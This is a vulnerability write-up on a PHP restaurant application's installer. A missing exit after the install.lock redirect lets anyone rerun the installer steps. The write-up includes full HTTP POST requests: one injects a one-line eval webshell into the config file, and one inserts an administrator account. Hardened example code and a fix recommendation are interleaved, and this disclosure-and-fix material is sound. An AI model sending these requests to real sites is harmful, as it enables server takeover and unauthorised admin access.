The problem is in /install/index.php. Once the program has been installed, an install.lock file is created in the program's root directory, but the check for install.lock in /install/index.php is wrong:

<?php
if(file_exists("../install.lock"))
{
    header("Location: ../"); // no exit after the redirect
}
//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
As you can see, when install.lock exists, header() only sends a 302 redirect and the script does not exit, so all of the logic that follows is still executed. This gives rise to at least two vulnerabilities.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']); // sic: "==" (comparison, not assignment) as in the original source
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str); // writes the submitted data straight into a PHP file
The code above writes the POSTed data directly into ../config/config.inc.php, so submitting the following POST request produces a one-line webshell:

POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

This method is very dangerous, however: it overwrites the configuration and leaves the site unable to run.
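For contrast, here is how the two defects in this step (the redirect without exit, and request data spliced verbatim into PHP source) are fixed. This is an added example, not the vendor's code; the function names install_guard, build_config and write_config, the allow-list patterns, and the lock-file location are assumptions.

```php
<?php
// Added example (not the vendor's code): hardened installer guard and config writer.
// Function names, allow-list patterns and the "../install.lock" path are assumptions.

declare(strict_types=1);

// 1. Refuse to run the installer once install.lock exists. A Location header
//    alone does not stop PHP; every statement after it still runs. exit does.
function install_guard(string $lockFile): void
{
    if (file_exists($lockFile)) {
        header('Location: ../', true, 302);
        exit;                                   // nothing below this line runs
    }
}

// 2. Never splice request data into PHP source as raw text. Validate each value
//    against a strict allow-list, then emit it with var_export(), which yields a
//    single-quoted PHP literal with ' and \ escaped, so characters such as " ) ;
//    or ?> in the value can never close the string or the define() call.
function build_config(array $input): string
{
    $rules = [
        'mysql_host' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'mysql_user' => '/^[A-Za-z0-9_]{1,32}$/',
        'mysql_pwd'  => '/^[\x20-\x7E]{1,128}$/',   // printable ASCII; quotes allowed, var_export handles them
        'mysql_db'   => '/^[A-Za-z0-9_]{1,64}$/',
        'tblpre'     => '/^[A-Za-z0-9_]{0,16}$/',
        'domain'     => '/^[A-Za-z0-9.\-]{1,253}$/',
    ];
    $values = [];
    foreach ($rules as $key => $pattern) {
        $v = trim((string)($input[$key] ?? ''));
        if (!preg_match($pattern, $v)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $values[$key] = $v;
    }

    $map = [
        'MYSQL_HOST'    => $values['mysql_host'],
        'MYSQL_USER'    => $values['mysql_user'],
        'MYSQL_PWD'     => $values['mysql_pwd'],
        'MYSQL_DB'      => $values['mysql_db'],
        'MYSQL_CHARSET' => 'GBK',
        'TABLE_PRE'     => $values['tblpre'],
        'DOMAIN'        => $values['domain'],
        'SKINS'         => 'default',
    ];
    $lines = ['<?php', '// generated by the installer; do not edit by hand'];
    foreach ($map as $name => $value) {
        $lines[] = sprintf('define(%s, %s);', var_export($name, true), var_export($value, true));
    }
    return implode("\n", $lines) . "\n";       // no closing ?> tag, so no trailing output
}

// 3. Write to a temp file with restrictive permissions and rename it into place,
//    so a half-written config.inc.php is never served.
function write_config(string $path, string $contents): void
{
    $tmp = $path . '.tmp.' . bin2hex(random_bytes(4));
    if (file_put_contents($tmp, $contents, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    chmod($tmp, 0640);
    rename($tmp, $path);
}

install_guard(__DIR__ . '/../install.lock');

// Constructed input with the same shape as the payload in the write-up: with the
// allow-list in place it is rejected before anything touches the filesystem.
$hostile = ['mysql_host' => 'test");@eval($_POST[x]);?>//', 'mysql_user' => '1',
            'mysql_pwd' => '2', 'mysql_db' => '3', 'tblpre' => 'koufu_', 'domain' => 'www'];
try {
    write_config(__DIR__ . '/../config/config.inc.php', build_config($hostile));
} catch (InvalidArgumentException $e) {
    error_log('installer rejected input: ' . $e->getMessage());   // logged, nothing written
}
```

The allow-list is the primary control; var_export() is defence in depth for fields such as the password where quotes and backslashes are legitimate characters. Dropping the closing ?> also removes a whole class of whitespace-after-tag bugs in generated config files.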
2. Adding an administrator directly

elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // inserts an administrator directly
    }
This means we can insert an administrator account qingshen/qingshen directly with the following request:

POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
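A hardened version of the step-5 handler, added here as an example and not taken from the vendor's code. It closes the three holes visible above: the lock check that does not exit, the password-mismatch branch that falls through to the INSERT, and the INSERT built by string interpolation. The function name create_founder, the mysqli connection setup, the "founder already exists" rule and the use of password_hash() in place of the application's umd5() are assumptions (the login code would then need a matching password_verify()).

```php
<?php
// Added example (not the vendor's code): hardened step-5 admin creation.
// create_founder, the admin table layout and password_hash() in place of umd5() are assumptions.

declare(strict_types=1);

function create_founder(mysqli $db, string $tablePre, array $post): void
{
    $adminname = trim((string)($post['adminname'] ?? ''));
    $pwd1      = (string)($post['pwd1'] ?? '');
    $pwd2      = (string)($post['pwd2'] ?? '');

    // Every failure path ends the request. In the original, the mismatch branch
    // printed an alert and then fell through to the INSERT anyway.
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $adminname)) {
        http_response_code(400);
        exit('admin name must be 3-32 characters: letters, digits, underscore');
    }
    if ($pwd1 !== $pwd2) {
        http_response_code(400);
        exit('passwords do not match');
    }
    if (strlen($pwd1) < 12) {
        http_response_code(400);
        exit('password must be at least 12 characters');
    }

    // TABLE_PRE comes from config.inc.php, which step 2 wrote from user input,
    // so it is validated before being placed in SQL as an identifier.
    $table = $tablePre . 'admin';
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $table)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    // The installer may create exactly one founder. Even if install.lock were
    // missing or deleted, a second founder cannot be added through this path.
    $row = $db->query("SELECT COUNT(*) AS n FROM `$table` WHERE isfounder = 1")->fetch_assoc();
    if ((int)$row['n'] > 0) {
        http_response_code(409);
        exit('a founder account already exists');
    }

    // Prepared statement: user input is bound as data, never spliced into SQL text.
    $stmt = $db->prepare("INSERT INTO `$table` (adminname, password, isfounder) VALUES (?, ?, 1)");
    $hash = password_hash($pwd1, PASSWORD_DEFAULT);
    $stmt->bind_param('ss', $adminname, $hash);
    $stmt->execute();
    $stmt->close();
}

// Lock check first, and it actually terminates the request.
$lock = __DIR__ . '/../install.lock';
if (file_exists($lock)) {
    header('Location: ../', true, 302);
    exit;
}

if (($_REQUEST['step'] ?? '') === '5' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once __DIR__ . '/../config/config.inc.php';   // defines MYSQL_* and TABLE_PRE
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $db = new mysqli(MYSQL_HOST, MYSQL_USER, MYSQL_PWD, MYSQL_DB);
    $db->set_charset(MYSQL_CHARSET);
    create_founder($db, TABLE_PRE, $_POST);
    touch($lock);                       // the lock is written as the final step of installation
    header('Location: ../', true, 302);
    exit;
}
```

Beyond the code fix, the operational control is to delete or block the /install/ directory after setup: with the lock-check bug on this page, the directory's mere presence on a deployed site is enough to expose both steps.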